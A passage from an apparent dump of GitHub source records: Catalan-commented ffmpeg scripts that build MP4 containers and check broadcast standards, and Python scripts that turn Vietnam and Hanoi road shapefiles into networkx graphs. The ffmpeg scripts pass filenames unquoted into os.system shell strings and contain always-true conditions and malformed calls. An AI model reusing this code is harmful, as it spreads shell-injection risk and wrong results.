seguent manera:\nEXEMPLE: *python3 readMP4container.py 'video.mp4'*\n\n**EXERCICI 4**\n\nAquest script permet rear containers i saber amb quin standard s'ajusten\nEs pot executar des de terminal de la seguent manera\nEXEMPLE: *python3 testContainer.py 'bbb_1min.mp4' 'bbb_mp3.mp3' 'bbb_subtitles.srt' 'outputFile.mp4'*\n\n**EXERCICI 5**\nI finalment la classe amb els scripts de crear containers automaticmanet i analizar la broadcast standard compatible\n\n"
},
{
"alpha_fraction": 0.5183896422386169,
"alphanum_fraction": 0.531312108039856,
"avg_line_length": 37.67307662963867,
"blob_id": "6b920ce4e4bcf7db351cb4b0a2eca3f15717b62f",
"content_id": "463aaae45828aa8950714ce5de4a89ee5d049e2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2014,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 52,
"path": "/claseLab3.py",
"repo_name": "paumonterop/P3_SCAV_VIDEO",
"src_encoding": "UTF-8",
"text": "import os, subprocess\n\nclass Lab3:\n\n def mp4_container(video, audio, subtitles, output):\n if audio is None:\n os.system('ffmpeg -i {} -c:v copy {}.mp4'.format(video, output))\n\n elif subtitles is None:\n os.system('ffmpeg -i {} -i {} -c:v copy -c:a -map 0:v:0 -map 1:a:0 {}'.format(video,\n audio, output))\n\n else:\n os.system('ffmpeg -i {} -i {} -i {} -c:v copy -c:a -c:s mov_text -map 0:v:0 -map 1:a:0 -map 2:s:0 {}'.format(\n video, audio, subtitles, output))\n\n def broadcast_fit(self, filename): # guardem codecs\n\n print('Broacdasting Standards compatibles amb', filename)\n codec_video = subprocess.getoutput('ffprobe -v error -select_streams v:0 -show_entries stream=codec_name -of '\n 'default=nokey=1:noprint_wrappers=1 {}'.format(filename))\n codec_audio = subprocess.getoutput('ffprobe -v error -select_streams a:0 -show_entries stream=codec_name -of '\n 'default=nokey=1:noprint_wrappers=1 {}'.format(filename))\n # print(codec_video)\n # print(codec_audio)\n\n # comparem els codecs del video amb els standards\n if codec_video == 'h264' or 'mpeg2':\n\n if codec_audio == 'mp3':\n broadcast = 'Compatible amb: DVB i DTMB'\n print(broadcast)\n\n elif codec_audio == 'aac':\n broadcast = 'Compatible amb: DVB i ISDB i DTMB'\n print(broadcast)\n\n elif codec_audio == 'ac-3':\n broadcast = 'Comaptible amb: DVB i ATSC i DTMB'\n print(broadcast)\n\n else:\n print('No és compatible amb cap Standard')\n\n elif codec_video == 'avs' or 'avs+':\n\n if codec_audio == 'mp2' or 'dra':\n broadcast = 'Compatible amb: DTMB'\n print(broadcast)\n\n else:\n print('No és compatible amb cap Standard')\n\n"
},
{
"alpha_fraction": 0.6133254170417786,
"alphanum_fraction": 0.6228435635566711,
"avg_line_length": 31.921567916870117,
"blob_id": "d65255f158ce399f383cd86501e6927545dd8452",
"content_id": "1f7773c5398e89f7a6509527b0153d74d7ea5779",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1683,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 51,
"path": "/readMP4container.py",
"repo_name": "paumonterop/P3_SCAV_VIDEO",
"src_encoding": "UTF-8",
"text": "import argparse\nimport subprocess\n\n# podem executarlo des de terminal posant el video en questio\n# EXEMPLE:\n# python3 readMP4container.py 'video.mp4'\n\nparser = argparse.ArgumentParser(description='Get video information')\nparser.add_argument('in_filename', help='Input filename')\nargs = parser.parse_args()\n\n\ndef broadcastFit(filename): # guardem codecs\n\n print('Broacdasting Standards compatibles amb', filename)\n codec_video = subprocess.getoutput('ffprobe -v error -select_streams v:0 -show_entries stream=codec_name -of '\n 'default=nokey=1:noprint_wrappers=1 {}'.format(filename))\n codec_audio = subprocess.getoutput('ffprobe -v error -select_streams a:0 -show_entries stream=codec_name -of '\n 'default=nokey=1:noprint_wrappers=1 {}'.format(filename))\n # print(codec_video)\n # print(codec_audio)\n\n # comparem els codecs del video amb els standards\n if codec_video == 'h264' or 'mpeg2':\n\n if codec_audio == 'mp3':\n broadcast = 'Compatible amb: DVB i DTMB'\n print(broadcast)\n\n elif codec_audio == 'aac':\n broadcast = 'Compatible amb: DVB i ISDB i DTMB'\n print(broadcast)\n\n elif codec_audio == 'ac-3':\n broadcast = 'Comaptible amb: DVB i ATSC i DTMB'\n print(broadcast)\n\n else:\n print('No és compatible amb cap Standard')\n\n elif codec_video == 'avs' or 'avs+':\n\n if codec_audio == 'mp2' or 'dra':\n broadcast = 'Compatible amb: DTMB'\n print(broadcast)\n\n else:\n print('No és compatible amb cap Standard')\n\n\nbroadcastFit(args.in_filename)\n\n\n"
},
{
"alpha_fraction": 0.5942408442497253,
"alphanum_fraction": 0.6308900713920593,
"avg_line_length": 37.25,
"blob_id": "b32c51bf36f4f215208458bcf43145d316daf637",
"content_id": "35fd1a16145d8b454bf53b92998c2698d7b655f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 764,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 20,
"path": "/testContainers.py",
"repo_name": "paumonterop/P3_SCAV_VIDEO",
"src_encoding": "UTF-8",
"text": "# Aquest script permet rear containers i saber amb quin standard s'ajusten\n# Es pot executar des de terminal de la seguent manera\n# EXEMPLE: python3 testContainer.py 'bbb_1min.mp4' 'bbb_mp3.mp3' 'bbb_subtitles.srt' 'outputFile.mp4'\n\nimport os\nimport sys\n\n\nif len(sys.argv) == 4: # nomes video i audio\n os.system('ffmpeg -i {} -i {} -c:v copy -c:a -map 0:v:0 -map 1:a:0 {}'.format(sys.argv[1],\n sys.argv[2], sys.argv[3]))\n\nelif len(sys.argv) == 5: # video, audio i subtitols\n os.system('ffmpeg -i {} -i {} -i {} -c:v copy -c:a -c:s mov_text -map 0:v:0 -map 1:a:0 -map 2:s:0 {}'.format(\n sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]))\n\nelse:\n print('Masses arguments')\n\nos.system('python3 readMP4container.py', sys.argv[4])"
},
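Because the script above interpolates filenames into a shell string via os.system, any path containing spaces or quotes breaks the command. A minimal sketch of the same video+audio mux using subprocess.run with an argument list; the flags are the ones from the script, the function name is illustrative:

import subprocess

def mux(video, audio, output):
    # an argument list needs no shell quoting, unlike an os.system format string
    subprocess.run(['ffmpeg', '-i', video, '-i', audio,
                    '-c:v', 'copy', '-c:a', 'copy',
                    '-map', '0:v:0', '-map', '1:a:0', output],
                   check=True)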
{
"alpha_fraction": 0.6189903616905212,
"alphanum_fraction": 0.6526442170143127,
"avg_line_length": 42.842105865478516,
"blob_id": "e55be6354c7e35c0672fc5ef8f856c2b7ed84252",
"content_id": "4fa9e59043d15dc0b97c4b3626cc55b8491d73be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 832,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 19,
"path": "/MP4container.py",
"repo_name": "paumonterop/P3_SCAV_VIDEO",
"src_encoding": "UTF-8",
"text": "# script per crear containers d'arxius MP4 amb video, audio i subtitols\n\nimport os\nimport sys\n\n# aquest script permet crear un container MP4 directament executant-lo des del terminal posant\n# el videoInput, AudioInput, subtitulsInput i el nom del fitxer de sortida\n# EXEMPLE: python3 MP4container.py 'bbb_1min.mp4' 'bbb_1min_lowbitrate.mp3' 'bbb_subtitles.srt' 'outputFile.mp4'\n\nif len(sys.argv) == 4: # nomes video i audio\n os.system('ffmpeg -i {} -i {} -c:v copy -c:a -map 0:v:0 -map 1:a:0 {}'.format(sys.argv[1],\n sys.argv[2], sys.argv[3]))\n\nelif len(sys.argv) == 5: # video, audio i subtitols\n os.system('ffmpeg -i {} -i {} -i {} -c:v copy -c:a -c:s mov_text -map 0:v:0 -map 1:a:0 -map 2:s:0 {}'.format(\n sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]))\n\nelse:\n print('Masses arguments')"
}
] | 5 |
Giangblackk/hanoi_road_map_analysis
|
https://github.com/Giangblackk/hanoi_road_map_analysis
|
bfba86342ebe17e51e28df79aeb8c847d4202f6b
|
5f327d790afabb7783f8f7d3ad92c2fb4bd95231
|
e5c99859ca8d62029f3d95d0ce5516bdff5f8069
|
refs/heads/master
| 2021-01-20T15:30:14.612063 | 2017-08-02T03:27:56 | 2017-08-02T03:27:56 | 90,773,267 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6828135251998901,
"alphanum_fraction": 0.7053748965263367,
"avg_line_length": 29.15999984741211,
"blob_id": "eaf52ae797f6ce640e359017f7e622f9da1e01f3",
"content_id": "d4294c202191347e4b61940a2a0416e2db49100a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1507,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 50,
"path": "/preprocess/find_self_loop_in_network.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 10 16:19:35 2017\n\n@author: giangblackk\n\"\"\"\n\n#import networkx as nx\n#\n#G = nx.read_gexf('./highway_line_singlepart_new_123.gexf')\n#i=0\n#for node in G.nodes_iter():\n# if node in G.neighbors(node):\n# i += 1\n# print(node, G.neighbors(node))\n#print(i)\n\nfrom osgeo import ogr\ndataSource = ogr.Open('./highway_line_singlepart.shp')\nlayer = dataSource.GetLayer()\n# layer.SetAttributeFilter(\"ONEWAY IN ('-1','yes','no')\")\nspatialRef = layer.GetSpatialRef()\n\noutputFileName = './highway_line_circle_loop.shp'\noutDriver = ogr.GetDriverByName('ESRI Shapefile')\noutDataSource = outDriver.CreateDataSource(outputFileName)\noutLayer = outDataSource.CreateLayer('highway', spatialRef, ogr.wkbLineString)\nfeatureDefn = outLayer.GetLayerDefn()\n\ni = 0\nfor feature in layer:\n geometry = feature.geometry()\n pointCount = geometry.GetPointCount()\n lastPoint = (geometry.GetPoint(pointCount-1)[0], geometry.GetPoint(pointCount-1)[1])\n firsPoint = (geometry.GetPoint(0)[0],geometry.GetPoint(0)[1])\n middlePointList = []\n for j in range(1,pointCount-1):\n middlePointList.append((geometry.GetPoint(j)[0], geometry.GetPoint(j)[1]))\n if firsPoint in middlePointList or lastPoint in middlePointList:\n i=i+1\n outFeature = ogr.Feature(featureDefn)\n outFeature.SetGeometry(geometry)\n outLayer.CreateFeature(outFeature)\nprint(i)\n\noutLayer = None\noutDataSource = None\nlayer = None \ndataSource = None"
},
{
"alpha_fraction": 0.611503541469574,
"alphanum_fraction": 0.64883953332901,
"avg_line_length": 25.078947067260742,
"blob_id": "136ecfc8f0e2422a4407da19837468981775acfd",
"content_id": "f221a52388447e6bfa1d4fc4754ac84b07487a57",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 991,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 38,
"path": "/preprocess/learn_bokeh.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 22 10:05:03 2017\n\n@author: giangblackk\n\"\"\"\n\nfrom bokeh.charts import Histogram, output_file, show\nfrom bokeh.sampledata.autompg import autompg as df\nimport numpy as np\n\n# df.sort_values(by='cyl', inplace=True)\n#hist = Histogram(df, values='hp', color='cyl',\n# title=\"HP Distribution by Cylinder Count\", legend='top_right')\n#\n#output_file(\"histogram_single.html\", title=\"histogram_single.py example\")\n#\n#show(hist)\n\ndata = np.array([1,2,3,2,1,2,3,2,3,1,3,3,1,2,1,2])\nhist = np.histogram(data, bins=[1,2,3,4])\nhist = list(hist)\nhist[1] = np.unique(data)\nimport pandas as pd\ndat = pd.DataFrame(np.array(hist).transpose(),columns=['a','b'])\n#import plotly.plotly as py\n#import plotly.graph_objs as go\n#\n#data = [go.Bar(\n# x=hist[1],\n# y=hist[0]\n# )]\n#\n#py.iplot(data, filename='basic-bar')\nimport seaborn as sns\nsns.set_style(\"whitegrid\")\nax = sns.barplot(x=\"b\", y=\"a\", data=dat)\n"
},
{
"alpha_fraction": 0.7753623127937317,
"alphanum_fraction": 0.7753623127937317,
"avg_line_length": 45.16666793823242,
"blob_id": "c5905af28ec60dcffb41eb0405f2429c37a0f43b",
"content_id": "3d080cf2a7250e7548db52bb4e7f91395b050c17",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 276,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 6,
"path": "/README.md",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "# hanoi_road_map_analysis\n## Data locations:\n- Vietnam highway map: /vietnam-highway/roaddata/R_VN_NHW_Inventory.shp\n- Vietnam highway network: /vietnam-highway/R_VN_NHW_Inventory.gexf\n## Code locations:\n- transform map to network: /vietnam-highway/from_vn_highway_to_graph.py"
},
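The README above points at the .gexf network file; a minimal sketch of loading it for analysis with networkx, assuming only the path listed in the README:

import networkx as nx

# path taken from the README above
G = nx.read_gexf('vietnam-highway/R_VN_NHW_Inventory.gexf')
print(G.number_of_nodes(), G.number_of_edges())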
{
"alpha_fraction": 0.5992010831832886,
"alphanum_fraction": 0.6110371351242065,
"avg_line_length": 42.05095672607422,
"blob_id": "8f744581dc67a8616cc91beaa61080c69bd6f406",
"content_id": "c52e444e5f40677dc9128ec47dfcfe9e5ee7004b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6759,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 157,
"path": "/vietnam-highway/from_vn_highway_to_graph.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nfrom osgeo import ogr, osr\nimport networkx as nx\nimport numpy as np\n\n#calculate length of StringLine\ndef calculateGeometryLength(pointList, sourceSRS, destSRS):\n line = ogr.Geometry(ogr.wkbLineString)\n transform = osr.CoordinateTransformation(sourceSRS,destSRS)\n for point in pointList:\n line.AddPoint(point[0],point[1])\n line.Transform(transform)\n return line.Length()\n\n# target srs for road length computation\ntarget_srs = osr.SpatialReference()\ntarget_srs.ImportFromProj4('+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs ')\n\nhighwayFileName = './roaddata/R_VN_NHW_Inventory.shp'\ndataSource = ogr.Open(highwayFileName)\nlayer = dataSource.GetLayer(0)\nsource_srs = layer.GetSpatialRef()\nfeatureCount = layer.GetFeatureCount()\nprint('featureCount: ', featureCount)\n\n# get attribute list\nattributeList = []\nlayerDefinition = layer.GetLayerDefn()\nfor i in range(layerDefinition.GetFieldCount()):\n fieldName = layerDefinition.GetFieldDefn(i).GetName()\n attributeList.append(fieldName)\n\nG = nx.Graph()\nnodeList = []\ni = 0\nfor feature in layer:\n geometry = feature.geometry()\n feature_length = geometry.Length()\n geometry.TransformTo(target_srs)\n pointCount = geometry.GetPointCount()\n pointList = geometry.GetPoints()\n pointList = np.around(np.array(pointList),decimals=10)\n pointList = list(map(tuple, pointList))\n pointList = [tuple(map(float, point)) for point in pointList]\n ### first point ###########################################################\n firstPoint = pointList[0]\n if not firstPoint in nodeList:\n nodeList.append(firstPoint)\n G.add_node(i, lng=firstPoint[0], lat=firstPoint[1])\n firstNodeID = i\n i = i + 1\n else:\n for nodeidx in G.nodes_iter():\n if G.node[nodeidx]['lng'] == float(firstPoint[0]) and G.node[nodeidx]['lat'] == float(firstPoint[1]):\n firstNodeID = nodeidx\n ### last point ############################################################\n lastPoint = pointList[-1]\n if not lastPoint in nodeList:\n nodeList.append(lastPoint)\n G.add_node(i, lng=lastPoint[0], lat=lastPoint[1])\n lastNodeID = i\n i = i + 1\n else:\n for nodeidx in G.nodes_iter():\n if G.node[nodeidx]['lng'] == float(lastPoint[0]) and G.node[nodeidx]['lat'] == float(lastPoint[1]):\n lastNodeID = nodeidx\n # create middle list\n middlePointList = pointList[1:-1]\n ### add edge between points ###############################################\n G.add_edge(lastNodeID, firstNodeID)\n for attribute in attributeList:\n G[lastNodeID][firstNodeID][attribute] = feature.GetField(attribute) if feature.GetField(attribute) is not None else ''\n G[lastNodeID][firstNodeID]['length'] = feature_length\n # add middle list to edge attribute\n G[lastNodeID][firstNodeID]['middle'] = middlePointList[::-1]\n ### intersect processing ##################################################\n for edge in G.edges():\n headID = edge[0]\n tailID = edge[1]\n attributeDict = G[headID][tailID]\n middle = attributeDict['middle']\n if firstPoint in middle:\n if headID == firstNodeID or firstNodeID == tailID:\n continue\n indexFirstPoint = middle.index(firstPoint)\n # copy attributes\n attributeDictPart1 = attributeDict.copy()\n attributeDictPart2 = attributeDict.copy()\n # recalculate middle\n attributeDictPart1['middle'] = middle[0:indexFirstPoint]\n attributeDictPart2['middle'] = middle[indexFirstPoint+1:]\n # recalucate length\n roadPart1 = [(G.node[headID]['lng'],G.node[headID]['lat'])]\n 
roadPart1.extend(middle[0:indexFirstPoint+1])\n roadPart2 = middle[indexFirstPoint:]\n roadPart2.append((G.node[tailID]['lng'],G.node[tailID]['lat']))\n attributeDictPart1['length'] = calculateGeometryLength(roadPart1,source_srs,target_srs)\n attributeDictPart2['length'] = calculateGeometryLength(roadPart2,source_srs,target_srs)\n G.remove_edge(headID, tailID)\n G.add_edge(headID, firstNodeID, attr_dict=attributeDictPart1)\n G.add_edge(firstNodeID, tailID, attr_dict=attributeDictPart2)\n elif lastPoint in middle:\n if headID == lastNodeID or lastNodeID == tailID:\n continue\n indexLastPoint = middle.index(lastPoint)\n # copy attributes\n attributeDictPart1 = attributeDict.copy()\n attributeDictPart2 = attributeDict.copy()\n # recalculate middle\n attributeDictPart1['middle'] = middle[0:indexLastPoint]\n attributeDictPart2['middle'] = middle[indexLastPoint+1:]\n # recalculate length\n roadPart1 = [(G.node[headID]['lng'],G.node[headID]['lat'])]\n roadPart1.extend(middle[0:indexLastPoint+1])\n roadPart2 = middle[indexLastPoint:]\n roadPart2.append((G.node[tailID]['lng'],G.node[tailID]['lat']))\n attributeDictPart1['length'] = calculateGeometryLength(roadPart1,source_srs,target_srs)\n attributeDictPart2['length'] = calculateGeometryLength(roadPart2,source_srs,target_srs)\n G.remove_edge(headID, tailID)\n G.add_edge(headID, lastNodeID, attr_dict=attributeDictPart1)\n G.add_edge(lastNodeID, tailID, attr_dict=attributeDictPart2)\n### remove middle properties ##################################################\nfor edge in G.edges_iter():\n G[edge[0]][edge[1]].pop('middle')\n### check if 2 node same lat long #############################################\nlat = G.node[0]['lat']\nlng = G.node[0]['lng']\nsameCount = -1\nfor i in G.nodes_iter():\n if G.node[i]['lat'] == lat and G.node[i]['lng'] == lng:\n sameCount += 1\n else:\n lat = G.node[i]['lat']\n lng = G.node[i]['lng']\nprint('same location Count: ',sameCount)\n\n### check for self loop in result graph #######################################\nself_loop_count = 0\nfor node in G.nodes_iter():\n if node in G.neighbors(node):\n self_loop_count += 1\n print(node, G.neighbors(node))\nprint('self_loop_count: ', self_loop_count)\n### remove little connected components due to wrong input data ################\nconnected_components = list(nx.connected_component_subgraphs(G))\nG2 = connected_components[0]\n### write graph to file #######################################################\nnx.write_gexf(G2,'./R_VN_NHW_Inventory_1_connected_component.gexf')\n#nx.write_graphml(G2,'./R_VN_NHW_Inventory_1_connected_component.graphml')\nlayer = None\ndataSource = None\n"
},
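The script above repeatedly measures road lengths by reprojecting point lists between spatial reference systems. A standalone sketch of that pattern using the same WGS84 and UTM zone 48 definitions that appear in this repo; the two coordinates are invented Hanoi-area points:

from osgeo import ogr, osr

source = osr.SpatialReference()
source.ImportFromProj4('+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs ')
target = osr.SpatialReference()
target.ImportFromProj4('+proj=utm +zone=48 +ellps=WGS84 +datum=WGS84 +units=m +no_defs ')

line = ogr.Geometry(ogr.wkbLineString)
for lng, lat in [(105.80, 21.00), (105.85, 21.02)]:  # illustrative points only
    line.AddPoint(lng, lat)
line.Transform(osr.CoordinateTransformation(source, target))
print(line.Length())  # length in metres once projected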
{
"alpha_fraction": 0.7170542478561401,
"alphanum_fraction": 0.7286821603775024,
"avg_line_length": 27.55555534362793,
"blob_id": "33a69be45a76629bce76c08d0887cbcc38786d62",
"content_id": "e75fae6714511fc19908df8e4c3fa0bc8f9cbcf3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 258,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 9,
"path": "/preprocess/.spyproject/workspace.ini",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "[workspace]\nsave_data_on_exit = True\nrestore_data_on_startup = True\nsave_history = True\nsave_non_project_files = False\n\n[main]\nversion = '0.1.0'\nrecent_files = [u'E:\\\\MyWorkspace\\\\DATN\\\\final\\\\hanoi_road_map_analysis\\\\preprocess\\\\simple_graph_statisic.py']\n\n"
},
{
"alpha_fraction": 0.6184789538383484,
"alphanum_fraction": 0.6492772102355957,
"avg_line_length": 29.01886749267578,
"blob_id": "c7472109ee8c2904396c0376fc43906cccb83f1e",
"content_id": "7baaf5dd995ea3cc955ca891a5c7fb13cf0174f8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1603,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 53,
"path": "/vietnam-highway/histogram_analysis.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 16 16:51:21 2017\n\n@author: giangblackk\n\"\"\"\n\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# G = nx.read_gexf('./R_VN_NHW_Inventory.gexf')\nG = nx.read_gexf('./R_VN_NHW_Inventory_1_connected_component.gexf')\n# x = nx.betweenness_centrality(G)\n#degree_sequence=sorted(nx.degree(G).values(),reverse=True)\n#plt.hist(degree_sequence, normed=True, facecolor='green')\n#plt.xlabel('Degree')\n#plt.ylabel('Percent')\n#plt.grid(True)\nneighbor_sequence=sorted(nx.degree(G).values(),reverse=True)\nneighbor_sequence_2 = []\nfor i in neighbor_sequence:\n if i != 2:\n neighbor_sequence_2.append(i)\nhist = np.histogram(neighbor_sequence_2, range=(1,7),bins=6,normed=True)\n# hist = np.histogram(neighbor_sequence, range=(1,7),bins=6)\nhist = list(hist)\n#hist[0] = hist[0]*100\n#hist[0] = hist[0]\nhist[1] = hist[1][:-1]\n\nfig, ax = plt.subplots()\nax.yaxis.grid(b=True, which='major', color='k', linestyle='--')\nax.set_axisbelow(True)\nwidth = 0.75\nrects1 = ax.bar(hist[1], hist[0], width, color='b',edgecolor='k')\nax.set_xlabel(u'Số bậc')\nax.set_ylabel(u'Phần trăm (%)')\n# plt.title('Degree Distribution')\nplt.title(u'Phân phối bậc')\ndef autolabel(rects):\n \"\"\"\n Attach a text label above each bar displaying its height\n \"\"\"\n for rect in rects:\n height = rect.get_height()\n ax.text(rect.get_x() + rect.get_width()/2., 1.005*height,\n '%.2f' % round(height,2),\n #'%d' % height,\n ha='center', va='bottom',fontweight='bold')\n\nautolabel(rects1)\n"
},
{
"alpha_fraction": 0.7131350636482239,
"alphanum_fraction": 0.729863703250885,
"avg_line_length": 30.05769157409668,
"blob_id": "ddf50c866bb87be441ffa865f2a34013faa2eded",
"content_id": "573d3fd2f82069c9f4274ed18ef6fc82063e8037",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1614,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 52,
"path": "/vietnam-highway/highway_nodes_extract.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 16 14:54:33 2017\n\n@author: giangblackk\n\"\"\"\n\nfrom osgeo import ogr\n\nhighwayFileName = './roaddata/R_VN_NHW_Inventory.shp'\n\ndataSource = ogr.Open(highwayFileName)\nlayer = dataSource.GetLayer(0)\nspatialRef = layer.GetSpatialRef()\nfeatureCount = layer.GetFeatureCount()\n\noutputFileName = './R_VN_NHW_Inventory_intersect_nodes.shp'\noutDriver = ogr.GetDriverByName('ESRI Shapefile')\noutDataSource = outDriver.CreateDataSource(outputFileName)\n\noutLayer = outDataSource.CreateLayer('highway', spatialRef, ogr.wkbPoint)\nfeatureDefn = outLayer.GetLayerDefn()\n\nnodeList = []\nfor i in range(featureCount):\n feature = layer.GetFeature(i)\n geometry = feature.geometry()\n pointList = geometry.GetPoints()\n pointCount = geometry.GetPointCount()\n firstPoint = (pointList[0][0],pointList[0][1])\n lastPoint = (pointList[-1][0],pointList[-1][1])\n firstPointGeo = ogr.Geometry(ogr.wkbPoint)\n lastPointGeo = ogr.Geometry(ogr.wkbPoint)\n firstPointGeo.AddPoint(firstPoint[0],firstPoint[1])\n lastPointGeo.AddPoint(lastPoint[0],lastPoint[1])\n if firstPoint not in nodeList:\n nodeList.append(firstPoint)\n outFeature = ogr.Feature(featureDefn)\n outFeature.SetGeometry(firstPointGeo)\n outLayer.CreateFeature(outFeature)\n if lastPoint not in nodeList:\n nodeList.append(lastPoint)\n outFeature = ogr.Feature(featureDefn)\n outFeature.SetGeometry(lastPointGeo)\n outLayer.CreateFeature(outFeature)\n\nprint(len(nodeList))\noutLayer = None\noutDataSource = None\nlayer = None\ndataSource = None"
},
{
"alpha_fraction": 0.635676920413971,
"alphanum_fraction": 0.658338189125061,
"avg_line_length": 27.213115692138672,
"blob_id": "ac1b36392e896f22f3e5200d7f212bf9773819c3",
"content_id": "75cbc88ef7a932c40f89d6e25b97037097c58adf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1721,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 61,
"path": "/preprocess/simple_graph_statisic.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "import networkx as nx\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nG = nx.read_gexf('./graphdata/highway_line_singlepart_new_length.gexf')\nG2 = nx.Graph(G)\n\n# histogram\n# hist = nx.degree_histogram(G)\nneighbor_sequence = [len(G2.neighbors(node)) for node in G.nodes_iter()]\n#plt.hist(neighbor_sequence, facecolor='green')\n#plt.xlabel('Number of Neighbor')\n#plt.ylabel('Percent')\n#plt.grid(True)\n\n\"\"\"\n# degree_sequence = list(nx.degree(G).values())\ndegree_sequence=sorted(nx.degree(G2).values(),reverse=True)\nplt.hist(degree_sequence, normed=True, facecolor='green')\nplt.xlabel('Degree')\nplt.ylabel('Percent')\nplt.grid(True)\n\"\"\"\n# check if node with no neigbors\n\n\"\"\"\n#check_1\nfor node in G.nodes_iter():\n if len(G2.neighbors(node))==0:\n print(node)\n# check_2\nfor node in G.nodes_iter():\n if G.in_degree()[node] == 0 and G.out_degree()[node] == 0:\n print(node)\n\"\"\"\nhist = np.histogram(neighbor_sequence, range=(1,7),bins=6,normed=True)\n# hist = np.histogram(neighbor_sequence, range=(1,7),bins=6)\nhist = list(hist)\nhist[0] = hist[0]*100\nhist[0] = hist[0]\nhist[1] = hist[1][:-1]\n\nfig, ax = plt.subplots()\nax.yaxis.grid(b=True, which='major', color='k', linestyle='--')\nax.set_axisbelow(True)\nwidth = 0.75\nrects1 = ax.bar(hist[1], hist[0], width, color='b',edgecolor='k')\nax.set_xlabel('Degree')\nax.set_ylabel('Percent')\nplt.title('Degree Distribution')\ndef autolabel(rects):\n \"\"\"\n Attach a text label above each bar displaying its height\n \"\"\"\n for rect in rects:\n height = rect.get_height()\n ax.text(rect.get_x() + rect.get_width()/2., 1.005*height,\n '%.2f' % round(height,2),\n ha='center', va='bottom',fontweight='bold')\n\nautolabel(rects1)\n"
},
{
"alpha_fraction": 0.6058428287506104,
"alphanum_fraction": 0.6169719696044922,
"avg_line_length": 42.1349983215332,
"blob_id": "6dc39f0faa082d6db51eea0b92dfc03d4b59af27",
"content_id": "d6cf3d626a190803b17f4f611193d1a9ebc96c46",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8626,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 200,
"path": "/preprocess/from_road_to_graph.py",
"repo_name": "Giangblackk/hanoi_road_map_analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 30 17:32:10 2017\n\n@author: giangblackk\n\"\"\"\n\nfrom osgeo import ogr, osr\nimport networkx as nx\nimport numpy as np\n\ndef calculateGeometryLength(pointList, sourceSRS, destSRS):\n line = ogr.Geometry(ogr.wkbLineString)\n transform = osr.CoordinateTransformation(sourceSRS,destSRS)\n for point in pointList:\n line.AddPoint(point[0],point[1])\n line.Transform(transform)\n return line.Length()\n\n# target srs for road length computation\ntarget_srs = osr.SpatialReference()\ntarget_srs.ImportFromProj4('+proj=utm +zone=48 +ellps=WGS84 +datum=WGS84 +units=m +no_defs ')\n\n# read source dataset\nhighwayFileName = './roaddata/highway_line_singlepart.shp'\ndataSource = ogr.Open(highwayFileName)\nlayer = dataSource.GetLayer(0)\nsource_srs = layer.GetSpatialRef()\nfeatureCount = layer.GetFeatureCount()\nprint('featureCount: ', featureCount)\n# layer.SetAttributeFilter(\"ONEWAY NOT IN ('yes', 